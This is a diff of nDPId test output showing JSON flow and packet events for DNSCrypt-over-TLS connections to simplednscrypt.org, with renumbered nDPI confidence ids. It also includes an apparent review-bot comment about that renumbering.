00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
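Review bot: The numeric key inside `"confidence"` changes from `"4"` to `"6"` for `DPI` in all three regenerated flow events of this hunk, and from `"3"` to `"5"` for `DPI (cache)` in the hunk that follows, while the names stay the same. This suggests the libnDPI bump renumbered the confidence enum, although the commit message does not say so. A log pipeline or detection rule that matches these events on the numeric id instead of the string would read a different confidence level after the update without any error. I would record this in the commit description, for example `confidence ids shifted by the libnDPI bump (DPI 4 -> 6, DPI (cache) 3 -> 5); match on the name, not the id`, and state in the event schema documentation which of the two fields is stable.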
@@ -15,23 +15,23 @@ 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1491813286393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286393,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSlAAIAGMLzAqCunhncaGMRTAbtepcAHAAAAAIACIADddQAAAgQFtAEDAwgBAQQC"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1491813286463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286463,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xE3jDV\/XWG\/Y3IASchA2bgAAAgQFHgEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1491813286463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286463,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSpAAIAGMMfAqCunhncaGMRNAbtYb9jc4w1f2FAQAEDoegAA"} 
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286275,"flow_last_seen":1491813286464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286464,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286470,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADUGuOWGdxoYwKgrpwG7xFOF+CiKXqXACIASchDdaAAAAgQFHgEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286470,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPSxAAIAGMMXAqCunhncaGMRTAbtepcAIhfgoi1AQAECPdQAA"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":48,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286393,"flow_last_seen":1491813286470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286470,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1491813286489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286489,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xFKVdKj9XuwOhIASchD+twAAAgQFHgEBBAIBAwMH"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1491813286489,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813286489,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPS5AAIAGMMPAqCunhncaGMRSAbte7A6ElXSo\/lAQAECwxAAA"} 
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} 
-00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain 
Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, 